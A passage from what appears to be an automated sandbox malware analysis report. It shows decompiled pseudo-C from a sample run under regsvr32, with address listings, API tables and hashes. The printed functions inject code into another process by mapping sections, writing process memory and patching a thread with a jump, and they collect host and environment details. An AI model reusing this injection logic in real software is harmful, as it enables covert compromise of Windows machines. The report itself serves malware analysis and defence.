					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E04AF8BF4( &_v36, 0x1ac4);
					_t119 =  *0x4b0f81c; // 0x4c2fbe8
					_t155 =  *0x4b0f830; // 0x4af0000
					_v36 = _t119;
					 *0x4b0f830 = _v8;
					 *0x4b0f81c = _t163;
					E04AF8CBB(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E04AFD3C6(_v16, _v8, _v44);
					_t124 = E04AFA43D("quatr");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x4b0f830 = _t155;
						 *0x4b0f81c = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































                                                                                                                                                                                              0x04afd44d
                                                                                                                                                                                              0x04afd453
                                                                                                                                                                                              0x04afd455
                                                                                                                                                                                              0x04afd459
                                                                                                                                                                                              0x04afd45b
                                                                                                                                                                                              0x04afd45e
                                                                                                                                                                                              0x04afd461
                                                                                                                                                                                              0x04afd464
                                                                                                                                                                                              0x04afd467
                                                                                                                                                                                              0x04afd46a
                                                                                                                                                                                              0x04afd475
                                                                                                                                                                                              0x04afd478
                                                                                                                                                                                              0x04afd47f
                                                                                                                                                                                              0x04afd47f
                                                                                                                                                                                              0x04afd484
                                                                                                                                                                                              0x04afd487
                                                                                                                                                                                              0x04afd489
                                                                                                                                                                                              0x04afd48c
                                                                                                                                                                                              0x04afd495
                                                                                                                                                                                              0x04afd68e
                                                                                                                                                                                              0x04afd68e
                                                                                                                                                                                              0x04afd691
                                                                                                                                                                                              0x04afd694
                                                                                                                                                                                              0x04afd699
                                                                                                                                                                                              0x04afd69f
                                                                                                                                                                                              0x04afd6a2
                                                                                                                                                                                              0x04afd6a2
                                                                                                                                                                                              0x04afd6a5
                                                                                                                                                                                              0x04afd6a9
                                                                                                                                                                                              0x04afd6ab
                                                                                                                                                                                              0x04afd6c0
                                                                                                                                                                                              0x04afd6c0
                                                                                                                                                                                              0x04afd6ca
                                                                                                                                                                                              0x04afd6d4
                                                                                                                                                                                              0x04afd6d4
                                                                                                                                                                                              0x04afd6db
                                                                                                                                                                                              0x04afd6db
                                                                                                                                                                                              0x04afd4a4
                                                                                                                                                                                              0x04afd4be
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd4c4
                                                                                                                                                                                              0x04afd4cc
                                                                                                                                                                                              0x04afd4d4
                                                                                                                                                                                              0x04afd4da
                                                                                                                                                                                              0x04afd4e1
                                                                                                                                                                                              0x04afd4e9
                                                                                                                                                                                              0x04afd4ea
                                                                                                                                                                                              0x04afd4f1
                                                                                                                                                                                              0x04afd4f4
                                                                                                                                                                                              0x04afd4f5
                                                                                                                                                                                              0x04afd4fc
                                                                                                                                                                                              0x04afd4ff
                                                                                                                                                                                              0x04afd506
                                                                                                                                                                                              0x04afd507
                                                                                                                                                                                              0x04afd50a
                                                                                                                                                                                              0x04afd516
                                                                                                                                                                                              0x04afd538
                                                                                                                                                                                              0x04afd540
                                                                                                                                                                                              0x04afd543
                                                                                                                                                                                              0x04afd54e
                                                                                                                                                                                              0x04afd54e
                                                                                                                                                                                              0x04afd540
                                                                                                                                                                                              0x04afd56a
                                                                                                                                                                                              0x04afd579
                                                                                                                                                                                              0x04afd57c
                                                                                                                                                                                              0x04afd581
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd5ab
                                                                                                                                                                                              0x04afd5bb
                                                                                                                                                                                              0x04afd5bd
                                                                                                                                                                                              0x04afd5c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd5d9
                                                                                                                                                                                              0x04afd5ec
                                                                                                                                                                                              0x04afd600
                                                                                                                                                                                              0x04afd60c
                                                                                                                                                                                              0x04afd611
                                                                                                                                                                                              0x04afd616
                                                                                                                                                                                              0x04afd61c
                                                                                                                                                                                              0x04afd622
                                                                                                                                                                                              0x04afd62a
                                                                                                                                                                                              0x04afd63a
                                                                                                                                                                                              0x04afd646
                                                                                                                                                                                              0x04afd650
                                                                                                                                                                                              0x04afd658
                                                                                                                                                                                              0x04afd65d
                                                                                                                                                                                              0x04afd660
                                                                                                                                                                                              0x04afd668
                                                                                                                                                                                              0x04afd668
                                                                                                                                                                                              0x04afd668
                                                                                                                                                                                              0x04afd66b
                                                                                                                                                                                              0x04afd66f
                                                                                                                                                                                              0x04afd670
                                                                                                                                                                                              0x04afd674
                                                                                                                                                                                              0x04afd678
                                                                                                                                                                                              0x04afd681
                                                                                                                                                                                              0x04afd687
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd687
                                                                                                                                                                                              0x04afd662
                                                                                                                                                                                              0x04afd666
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afd666

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • NtCreateSection.NTDLL(04AFD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 04AFD4B9
                                                                                                                                                                                              • RegisterClassExA.USER32(?), ref: 04AFD50D
                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 04AFD538
                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 04AFD543
                                                                                                                                                                                              • UnregisterClassA.USER32 ref: 04AFD54E
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(04AFD982,00000000), ref: 04AFD579
                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(04AFD982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 04AFD5A0
                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 04AFD5E6
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 04AFD600
                                                                                                                                                                                                • Part of subcall function 04AF8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04AF8C3A
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,04AF61C5), ref: 04AFD678
                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 04AFD6C0
                                                                                                                                                                                              • NtClose.NTDLL(00000000), ref: 04AFD6D4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                              • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                                              • API String ID: 494031690-2640591812
                                                                                                                                                                                              • Opcode ID: 21d8711d259468aac7ad4b2b485f50ac7c83ea07199028c135afebc74c36d099
                                                                                                                                                                                              • Instruction ID: 4ffdc39d708dcf05396375bd46da47b84dee01742d6cddb6a221ee0872ac66c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d8711d259468aac7ad4b2b485f50ac7c83ea07199028c135afebc74c36d099
                                                                                                                                                                                              • Instruction Fuzzy Hash: B28107B1A00219AFDB21DFD4DC84EEEBBB8FB18705F14416AF605A7290D774AE41CB64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFD959 Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 211 4afd959-4afd972 call 4afd218 214 4afda4b-4afda56 call 4afd38b 211->214 215 4afd978-4afd986 call 4afd447 211->215 215->214 220 4afd98c-4afd9c3 call 4af8d6d GetThreadContext 215->220 220->214 223 4afd9c9-4afda09 NtProtectVirtualMemory 220->223 224 4afda0b-4afda26 NtWriteVirtualMemory 223->224 225 4afda49 223->225 224->225 226 4afda28-4afda47 NtProtectVirtualMemory 224->226 225->214 226->214 226->225
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFD959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E04AFD218(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E04AFD447( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E04AF8D6D( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E04AFD38B();
				return _t66;
			}



















                                                                                                                                                                                              0x04afd965
                                                                                                                                                                                              0x04afd967
                                                                                                                                                                                              0x04afd969
                                                                                                                                                                                              0x04afd972
                                                                                                                                                                                              0x04afd97d
                                                                                                                                                                                              0x04afd982
                                                                                                                                                                                              0x04afd986
                                                                                                                                                                                              0x04afd99a
                                                                                                                                                                                              0x04afd9a2
                                                                                                                                                                                              0x04afd9c3
                                                                                                                                                                                              0x04afd9c9
                                                                                                                                                                                              0x04afd9d1
                                                                                                                                                                                              0x04afd9df
                                                                                                                                                                                              0x04afd9e5
                                                                                                                                                                                              0x04afd9e6
                                                                                                                                                                                              0x04afd9f2
                                                                                                                                                                                              0x04afd9f9
                                                                                                                                                                                              0x04afda09
                                                                                                                                                                                              0x04afda49
                                                                                                                                                                                              0x04afda49
                                                                                                                                                                                              0x04afda28
                                                                                                                                                                                              0x04afda28
                                                                                                                                                                                              0x04afda47
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afda47
                                                                                                                                                                                              0x04afda09
                                                                                                                                                                                              0x04afd9c3
                                                                                                                                                                                              0x04afd986
                                                                                                                                                                                              0x04afda4b
                                                                                                                                                                                              0x04afda56

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFD218: LoadLibraryW.KERNEL32 ref: 04AFD312
                                                                                                                                                                                                • Part of subcall function 04AFD447: NtCreateSection.NTDLL(04AFD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 04AFD4B9
                                                                                                                                                                                                • Part of subcall function 04AFD447: RegisterClassExA.USER32(?), ref: 04AFD50D
                                                                                                                                                                                                • Part of subcall function 04AFD447: CreateWindowExA.USER32 ref: 04AFD538
                                                                                                                                                                                                • Part of subcall function 04AFD447: DestroyWindow.USER32(00000000), ref: 04AFD543
                                                                                                                                                                                                • Part of subcall function 04AFD447: UnregisterClassA.USER32 ref: 04AFD54E
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 04AFD9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 04AFDA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 04AFDA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 04AFDA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: 1f79157f6e9b3ec990c90867f03fc1a9a19d78111168086f898473e8bb661233
                                                                                                                                                                                              • Instruction ID: da00e6b765f6125332daab015efccfa80bc1f69f3c21b2035ea485f3557fd552
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f79157f6e9b3ec990c90867f03fc1a9a19d78111168086f898473e8bb661233
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E312D72A0010AAFDB21DFE4DD84FEEBBBCEF45215F1041A6EA05E7160D770EA458B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFDF3D Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E04AFDF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x4b0f830; // 0x4af0000
				_t68 = E04AF8BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x4b0f818; // 0x4c2f8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E04B03548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x4b0f818; // 0x4c2f8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E04AF95F3(_t194, _t207);
					}
					_t75 =  *0x4b0f818; // 0x4c2f8b0
					_t77 = E04AFC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E04AFC9F4( *_t77) == 0) {
						_t79 = E04AFC8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E04AFF3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E04AFF368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x4b0f820; // 0x4c2faa0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E04AFDF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E04AF95F3(_t149, _t211);
					}
					_t92 = E04AFC6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E04AFC4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E04AF99DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E04AF960D(_t149, _t36);
					_t97 = E04AFE2C5(_t196, E04AFA43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E04AFC6E4(_t97, _t37, _t216);
					_t99 =  *0x4b0f818; // 0x4c2f8b0
					_t101 = E04AFCA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E04AF8D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E04AFDD39(_t100);
					_t106 = E04AFDD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E04AF9DF2(_t105, 0x9cf);
					_t177 =  *0x4b0f818; // 0x4c2f8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x4b0f818; // 0x4c2f8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E04AF8BAF( &_v8);
					_t113 =  *0x4b0f818; // 0x4c2f8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E04AF9E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x4b0f818; // 0x4c2f8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x4b0f818; // 0x4c2f8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x4b0f818; // 0x4c2f8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x4b0f818; // 0x4c2f8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x4b0f818; // 0x4c2f8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x4b0f818; // 0x4c2f8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E04B03548(E04AFE2C5(_t62, E04AFA43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E04B0351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E04AF96DA(_t66, _t191);
					_t134 = E04AFDAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































                                                                                                                                                                                              0x04afdf3d
                                                                                                                                                                                              0x04afdf47
                                                                                                                                                                                              0x04afdf53
                                                                                                                                                                                              0x04afdf58
                                                                                                                                                                                              0x04afdf5d
                                                                                                                                                                                              0x04afdf6a
                                                                                                                                                                                              0x04afdf70
                                                                                                                                                                                              0x04afdf75
                                                                                                                                                                                              0x04afdf7b
                                                                                                                                                                                              0x04afdf8b
                                                                                                                                                                                              0x04afdf90
                                                                                                                                                                                              0x04afdf95
                                                                                                                                                                                              0x04afdf95
                                                                                                                                                                                              0x04afdfa5
                                                                                                                                                                                              0x04afdfab
                                                                                                                                                                                              0x04afdfad
                                                                                                                                                                                              0x04afdfb6
                                                                                                                                                                                              0x04afdfb6
                                                                                                                                                                                              0x04afdfbc
                                                                                                                                                                                              0x04afdfc9
                                                                                                                                                                                              0x04afdfce
                                                                                                                                                                                              0x04afdfd4
                                                                                                                                                                                              0x04afdfdd
                                                                                                                                                                                              0x04afdfeb
                                                                                                                                                                                              0x04afdff2
                                                                                                                                                                                              0x04afdff7
                                                                                                                                                                                              0x04afdff7
                                                                                                                                                                                              0x04afdff8
                                                                                                                                                                                              0x04afdfdf
                                                                                                                                                                                              0x04afdfdf
                                                                                                                                                                                              0x04afdfdf
                                                                                                                                                                                              0x04afdffe
                                                                                                                                                                                              0x04afe004
                                                                                                                                                                                              0x04afe009
                                                                                                                                                                                              0x04afe00f
                                                                                                                                                                                              0x04afe014
                                                                                                                                                                                              0x04afe01a
                                                                                                                                                                                              0x04afe01a
                                                                                                                                                                                              0x04afe023
                                                                                                                                                                                              0x04afe029
                                                                                                                                                                                              0x04afe02d
                                                                                                                                                                                              0x04afe034
                                                                                                                                                                                              0x04afe03b
                                                                                                                                                                                              0x04afe042
                                                                                                                                                                                              0x04afe046
                                                                                                                                                                                              0x04afe04d
                                                                                                                                                                                              0x04afe04e
                                                                                                                                                                                              0x04afe050
                                                                                                                                                                                              0x04afe055
                                                                                                                                                                                              0x04afe05c
                                                                                                                                                                                              0x04afe05e
                                                                                                                                                                                              0x04afe05e
                                                                                                                                                                                              0x04afe06e
                                                                                                                                                                                              0x04afe073
                                                                                                                                                                                              0x04afe073
                                                                                                                                                                                              0x04afe080
                                                                                                                                                                                              0x04afe086
                                                                                                                                                                                              0x04afe08b
                                                                                                                                                                                              0x04afe08d
                                                                                                                                                                                              0x04afe096
                                                                                                                                                                                              0x04afe096
                                                                                                                                                                                              0x04afe09e
                                                                                                                                                                                              0x04afe0a3
                                                                                                                                                                                              0x04afe0a3
                                                                                                                                                                                              0x04afe0a9
                                                                                                                                                                                              0x04afe0b4
                                                                                                                                                                                              0x04afe0b9
                                                                                                                                                                                              0x04afe0c1
                                                                                                                                                                                              0x04afe0c7
                                                                                                                                                                                              0x04afe0cf
                                                                                                                                                                                              0x04afe0e1
                                                                                                                                                                                              0x04afe0e7
                                                                                                                                                                                              0x04afe0ef
                                                                                                                                                                                              0x04afe0f4
                                                                                                                                                                                              0x04afe101
                                                                                                                                                                                              0x04afe112
                                                                                                                                                                                              0x04afe118
                                                                                                                                                                                              0x04afe11d
                                                                                                                                                                                              0x04afe120
                                                                                                                                                                                              0x04afe123
                                                                                                                                                                                              0x04afe130
                                                                                                                                                                                              0x04afe136
                                                                                                                                                                                              0x04afe140
                                                                                                                                                                                              0x04afe140
                                                                                                                                                                                              0x04afe146
                                                                                                                                                                                              0x04afe14e
                                                                                                                                                                                              0x04afe159
                                                                                                                                                                                              0x04afe15e
                                                                                                                                                                                              0x04afe164
                                                                                                                                                                                              0x04afe166
                                                                                                                                                                                              0x04afe173
                                                                                                                                                                                              0x04afe174
                                                                                                                                                                                              0x04afe175
                                                                                                                                                                                              0x04afe180
                                                                                                                                                                                              0x04afe182
                                                                                                                                                                                              0x04afe189
                                                                                                                                                                                              0x04afe189
                                                                                                                                                                                              0x04afe193
                                                                                                                                                                                              0x04afe198
                                                                                                                                                                                              0x04afe19d
                                                                                                                                                                                              0x04afe19d
                                                                                                                                                                                              0x04afe1a3
                                                                                                                                                                                              0x04afe1aa
                                                                                                                                                                                              0x04afe1ab
                                                                                                                                                                                              0x04afe1b8
                                                                                                                                                                                              0x04afe1cb
                                                                                                                                                                                              0x04afe1d0
                                                                                                                                                                                              0x04afe1d5
                                                                                                                                                                                              0x04afe1de
                                                                                                                                                                                              0x04afe1de
                                                                                                                                                                                              0x04afe1e4
                                                                                                                                                                                              0x04afe1e9
                                                                                                                                                                                              0x04afe1ef
                                                                                                                                                                                              0x04afe1f5
                                                                                                                                                                                              0x04afe1fa
                                                                                                                                                                                              0x04afe203
                                                                                                                                                                                              0x04afe205
                                                                                                                                                                                              0x04afe20c
                                                                                                                                                                                              0x04afe20c
                                                                                                                                                                                              0x04afe212
                                                                                                                                                                                              0x04afe21a
                                                                                                                                                                                              0x04afe21f
                                                                                                                                                                                              0x04afe220
                                                                                                                                                                                              0x04afe225
                                                                                                                                                                                              0x04afe22e
                                                                                                                                                                                              0x04afe230
                                                                                                                                                                                              0x04afe23b
                                                                                                                                                                                              0x04afe23b
                                                                                                                                                                                              0x04afe244
                                                                                                                                                                                              0x04afe24c
                                                                                                                                                                                              0x04afe253
                                                                                                                                                                                              0x04afe258
                                                                                                                                                                                              0x04afe267
                                                                                                                                                                                              0x04afe27f
                                                                                                                                                                                              0x04afe286
                                                                                                                                                                                              0x04afe294
                                                                                                                                                                                              0x04afe29f
                                                                                                                                                                                              0x04afe2a0
                                                                                                                                                                                              0x04afe2a4
                                                                                                                                                                                              0x04afe2aa
                                                                                                                                                                                              0x04afe2ab
                                                                                                                                                                                              0x04afe2b3
                                                                                                                                                                                              0x04afe2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afe2c0
                                                                                                                                                                                              0x04afe2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04AFDF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 04AFE05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 04AFE06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 04AFE123
                                                                                                                                                                                                • Part of subcall function 04AFC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04AF0000), ref: 04AFC96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 04AFE14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3131805607-2706916422
                                                                                                                                                                                              • Opcode ID: 474b86a5f90093d579a35c2424c472388f283c3ca2c6429b7eca0ef0196ee865
                                                                                                                                                                                              • Instruction ID: beefaf124aa17b2541996d7799be57894919dad27f2d915340923164a9a14f45
                                                                                                                                                                                              • Opcode Fuzzy Hash: 474b86a5f90093d579a35c2424c472388f283c3ca2c6429b7eca0ef0196ee865
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A916D71700605AFE714EBB4DD49FEAB7E8FF08305F00416AF61997290EB74B9858BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFC5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E04AFC5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
